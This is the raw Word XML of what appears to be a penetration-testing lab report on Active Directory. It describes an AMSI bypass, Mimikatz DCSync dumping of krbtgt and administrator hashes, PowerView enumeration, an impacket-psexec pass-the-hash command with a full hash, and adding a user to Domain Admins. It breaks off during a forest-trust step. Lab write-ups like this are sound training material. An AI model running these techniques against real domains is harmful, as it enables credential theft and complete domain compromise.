            <wp:extent cx="5943600" cy="2894618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17FB" w14:textId="7E1FC9A2" w:rsidR="005B1265" w:rsidRDefault="005B1265" w:rsidP="00C53AEC">
      <w:pPr>
        <w:jc w:val="both"/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</w:pP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I bypassed AMSI on dbserver31, imported </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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imikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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nd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performed</w:t>
      </w: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a</w:t>
      </w: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CSync attack. In a DCSync attack, we impersonate a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domain</w:t>
      </w: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controller</w:t>
      </w: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o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recover</w:t>
      </w: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passwords via domain replication. For this we need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some</w:t>
      </w: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permissions</w:t>
      </w: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on the domain controller. SQLSERVERSYNC already has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these</w:t>
      </w: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permissions.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1265">
        <w:t xml:space="preserve">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I dumped the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 hash and administrator hash successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24875858" w14:textId="419A50AE" w:rsidR="005B1265" w:rsidRDefault="005B1265" w:rsidP="00C53A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631DDC" wp14:editId="1D7C38C3">
            <wp:extent cx="5943600" cy="2894618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F3C2" w14:textId="4471EAE7" w:rsidR="005B1265" w:rsidRDefault="005B1265" w:rsidP="00C53A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CBD3003" wp14:editId="29E4AA9C">
            <wp:extent cx="5943600" cy="2894618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7DA7" w14:textId="3D22FB5B" w:rsidR="005B1265" w:rsidRDefault="005B1265" w:rsidP="00C53A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FA4FF7" wp14:editId="7442AE3B">
            <wp:extent cx="5943600" cy="2894618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9785" w14:textId="002DB5F3" w:rsidR="005B1265" w:rsidRPr="005B1265" w:rsidRDefault="005B1265" w:rsidP="00C53AEC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>imported</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>PowerView.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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5B1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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5B1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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5B1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>current</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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5B1265">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>domain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4485FA67" w14:textId="77777777" w:rsidR="005B1265" w:rsidRPr="005B1265" w:rsidRDefault="005B1265" w:rsidP="005B1265">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1265">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005B1265">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.\PowerView.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A25DA0" w14:textId="77777777" w:rsidR="005B1265" w:rsidRPr="005B1265" w:rsidRDefault="005B1265" w:rsidP="005B1265">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1265">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1265">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NetDomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C491C2B" w14:textId="67E7B9DA" w:rsidR="005B1265" w:rsidRDefault="005B1265" w:rsidP="00C53AE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D7D708" w14:textId="2B5C7D42" w:rsidR="005B1265" w:rsidRDefault="005B1265" w:rsidP="00C53A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E4D193F" wp14:editId="7394B7CF">
            <wp:extent cx="5943600" cy="1839596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0699" w14:textId="642EAA60" w:rsidR="005B1265" w:rsidRDefault="005B1265" w:rsidP="00C53AEC">
      <w:pPr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In order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for</w:t>
      </w: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ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-exec</w:t>
      </w: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o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access</w:t>
      </w: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ech-dc, I need its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IP</w:t>
      </w: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ddress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(172.16.4.1),</w:t>
      </w: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which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I</w:t>
      </w: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got from </w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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ping</w:t>
      </w:r>
      <w:r w:rsidRPr="005B126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ech-dc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4B1544" w14:textId="72834C9A" w:rsidR="005B1265" w:rsidRDefault="005B1265" w:rsidP="00C53A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AD066EF" wp14:editId="32ECACA7">
            <wp:extent cx="5943009" cy="2631571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8"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="26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EB58B" w14:textId="6D0E5A50" w:rsidR="005B1265" w:rsidRDefault="00E40A94" w:rsidP="00C53AEC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A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used</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A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E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>impacket’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E40A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E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E40A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script</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A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to</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A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access</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A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Domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94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Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94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having</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94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Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94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hash using the following command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> on my host(kali) machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BBF4EE" w14:textId="77777777" w:rsidR="00E40A94" w:rsidRPr="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00E40A94">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3828"/>
          <w:tab w:val="left" w:pos="8521"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>impacket-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId59">
        <w:r w:rsidRPr="00E40A94">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:b/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>tech/administrator@172.16.4.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD5CA3A" w14:textId="727D7C4B" w:rsidR="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00E40A94">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:acfd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>00282fbe922483c12e049e6e8990</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1574BBE9" w14:textId="77777777" w:rsidR="00E40A94" w:rsidRPr="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00E40A94">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="748"/>
          <w:tab w:val="left" w:pos="1038"/>
          <w:tab w:val="left" w:pos="1750"/>
          <w:tab w:val="left" w:pos="3287"/>
          <w:tab w:val="left" w:pos="3846"/>
          <w:tab w:val="left" w:pos="4812"/>
          <w:tab w:val="left" w:pos="5291"/>
          <w:tab w:val="left" w:pos="6326"/>
          <w:tab w:val="left" w:pos="7580"/>
          <w:tab w:val="left" w:pos="8780"/>
          <w:tab w:val="left" w:pos="9244"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="13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0A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>And</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>successfully</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>got</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>tech-dc)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40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40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E40A94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b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>authority\system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53163178" w14:textId="77777777" w:rsidR="00E40A94" w:rsidRPr="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00E40A9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4DE601" w14:textId="77777777" w:rsidR="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00C53AEC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79CC0F3B" w14:textId="1FE2B5F5" w:rsidR="005B1265" w:rsidRDefault="00E40A94" w:rsidP="00C53A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5A59344" wp14:editId="182D1233">
            <wp:extent cx="5943600" cy="2894030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E1CF" w14:textId="77777777" w:rsidR="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00C53A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a Domain Admin, I added </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>studentus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“Domain Admins” group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4696127D" w14:textId="27FA6B84" w:rsidR="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00C53A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845D479" wp14:editId="11C5BCED">
            <wp:extent cx="5943600" cy="2894030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7D45" w14:textId="77777777" w:rsidR="00E40A94" w:rsidRPr="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00C53AE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A32875" w14:textId="77777777" w:rsidR="00E40A94" w:rsidRPr="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00E40A94">
      <w:pPr>
        <w:pStyle w:val="Heading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9" w:name="_Toc146476889"/>
      <w:bookmarkStart w:id="30" w:name="_Toc146477327"/>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>FINANCE-DC:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="14C74F2E" w14:textId="77777777" w:rsidR="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00E40A94">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DAF44E3" w14:textId="5B4F85A7" w:rsidR="00E40A94" w:rsidRPr="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00E40A94">
      <w:pPr>
        <w:pStyle w:val="BodyText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A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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need</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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to</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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get</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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to</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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Child</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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to</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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forest</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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root.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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For</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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this</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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I</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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need</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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following</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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in</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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order</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A9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40A94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>to create an inter-realm TGT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B499A" w14:textId="4023BB1B" w:rsidR="00E40A94" w:rsidRPr="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00E40A94">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E40A94">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="31" w:name="_Toc146476890"/>
      <w:bookmarkStart w:id="32" w:name="_Toc146477328"/>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
